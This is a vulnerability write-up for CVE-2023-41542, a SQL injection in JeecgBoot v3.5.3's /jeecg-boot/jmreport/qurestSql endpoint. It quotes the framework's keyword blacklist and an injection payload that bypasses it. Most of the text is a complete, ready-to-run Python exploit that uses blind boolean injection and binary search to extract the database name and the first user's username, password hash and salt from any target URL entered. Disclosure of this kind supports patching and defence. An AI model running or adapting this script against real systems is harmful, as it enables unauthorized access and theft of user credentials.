CVE-2023-41542(JeecgBoot Sql Injection)

Description

JEECG Boot v3.5.3 was discovered to contain a SQL injection in /jeecg boot/jmreport/qurestSql

Affected version

JeecgBoot <= v3.5.3

Vulnerability Analysis

It was found that the framework has protected the original SQL injection by adding a blacklist. The blacklist is as follows：

“exec|peformance_schema|information_schema|extractvalue|updatexml|geohash|gtid_subset|gtid_subtract| insert | alter | delete | grant | update | drop | chr | mid | master | truncate | char | declare |user()|”;

Therefore, it is possible to directly construct payloads outside of the blacklist to bypass existing protective measures，As I mentioned in the report

1 'having {ascii}=(nullif (ascii (substring ((select database()), {place}, 1)), 0) or'

Exp

The complete utilization script is as follows

import requests
import json

def get_database(url):
    url=url+"/jeecg-boot/jmreport/qurestSql"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer': 'http://localhost:8088/jeecg-boot/jmreport/list',
        'X-Access-Token': 'null',
        'token': 'null',
        'JmReport-Tenant-Id': 'null',
        'Content-Type': 'application/json',
        'Connection': 'close',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'no-cors',
        'Sec-Fetch-Site': 'same-origin',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
    # payload = """{"apiSelectId":"1316997232402231298","id":"1'   having 106=(nullif(ascii((substring((select database()),1,1))),0)) or     '"}"""
    payload="""{"apiSelectId":"1316997232402231298","id":"1'   having 32<(nullif(ascii((substring((select database()),{length},1))),0)) or     '"}"""
    length=1
    while True:
        payload=f"""{{"apiSelectId":"1316997232402231298","id":"1'   having 32<(nullif(ascii((substring((select database()),{length},1))),0)) or     '"}}"""
        response=requests.post(url,headers=headers,data=payload)
        res=json.loads(response.text)
        if res["result"]==None:
            break
        else:
            length+=1
    database=""
    for place in range(1,length):
        min=32
        max=128
        mid=(min+max)//2
        while min<max:
            payload=f"""{{"apiSelectId":"1316997232402231298","id":"1'   having {mid}<(nullif(ascii((substring((select database()),{place},1))),0)) or     '"}}"""
            response=requests.post(url,headers=headers,data=payload)
            res=json.loads(response.text)
            if res["result"]!=None:
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        database+=chr(mid)
    print(database)
def get_user_password(url):
    url=url+"/jeecg-boot/jmreport/qurestSql"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer': 'http://localhost:8088/jeecg-boot/jmreport/list',
        'X-Access-Token': 'null',
        'token': 'null',
        'JmReport-Tenant-Id': 'null',
        'Content-Type': 'application/json',
        'Connection': 'close',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'no-cors',
        'Sec-Fetch-Site': 'same-origin',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
    length=1
    while True:
        payload=f"""{{"apiSelectId":"1316997232402231298","id":"1'   having 32<(nullif(ascii((substring((select username from sys_user limit 1,1),{length},1))),0)) or     '"}}"""
        response=requests.post(url,headers=headers,data=payload)
        res=json.loads(response.text)
        if res["result"]==None:
            break
        else:
            length+=1
    username=""
    for place in range(1,length):
        min=32
        max=128
        mid=(min+max)//2
        while min<max:
            payload=f"""{{"apiSelectId":"1316997232402231298","id":"1'   having {mid}<(nullif(ascii((substring((select username from sys_user limit 1,1),{place},1))),0)) or     '"}}"""
            response=requests.post(url,headers=headers,data=payload)
            res=json.loads(response.text)
            if res["result"]!=None:
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        username+=chr(mid)
    length=1
    while True:
        payload=f"""{{"apiSelectId":"1316997232402231298","id":"1'   having 32<(nullif(ascii((substring((select password from sys_user limit 1,1),{length},1))),0)) or     '"}}"""
        response=requests.post(url,headers=headers,data=payload)
        res=json.loads(response.text)
        if res["result"]==None:
            break
        else:
            length+=1
    password=""
    for place in range(1,length):
        min=32
        max=128
        mid=(min+max)//2
        while min<max:
            payload=f"""{{"apiSelectId":"1316997232402231298","id":"1'   having {mid}<(nullif(ascii((substring((select password from sys_user limit 1,1),{place},1))),0)) or     '"}}"""
            response=requests.post(url,headers=headers,data=payload)
            res=json.loads(response.text)
            if res["result"]!=None:
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        password+=chr(mid)
    length=1
    while True:
        payload=f"""{{"apiSelectId":"1316997232402231298","id":"1'   having 32<(nullif(ascii((substring((select salt from sys_user limit 1,1),{length},1))),0)) or     '"}}"""
        response=requests.post(url,headers=headers,data=payload)
        res=json.loads(response.text)
        if res["result"]==None:
            break
        else:
            length+=1
    salt=""
    for place in range(1,length):
        min=32
        max=128
        mid=(min+max)//2
        while min<max:
            payload=f"""{{"apiSelectId":"1316997232402231298","id":"1'   having {mid}<(nullif(ascii((substring((select salt from sys_user limit 1,1),{place},1))),0)) or     '"}}"""
            response=requests.post(url,headers=headers,data=payload)
            res=json.loads(response.text)
            if res["result"]!=None:
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        salt+=chr(mid)
    print("用户名为："+username+"\n密码为："+password+"\n盐为："+salt)
# get_database("http://localhost:8088")
url=input("please input your target: (example:http://localhost:8088)")
# get_database(url)
get_user_password(url)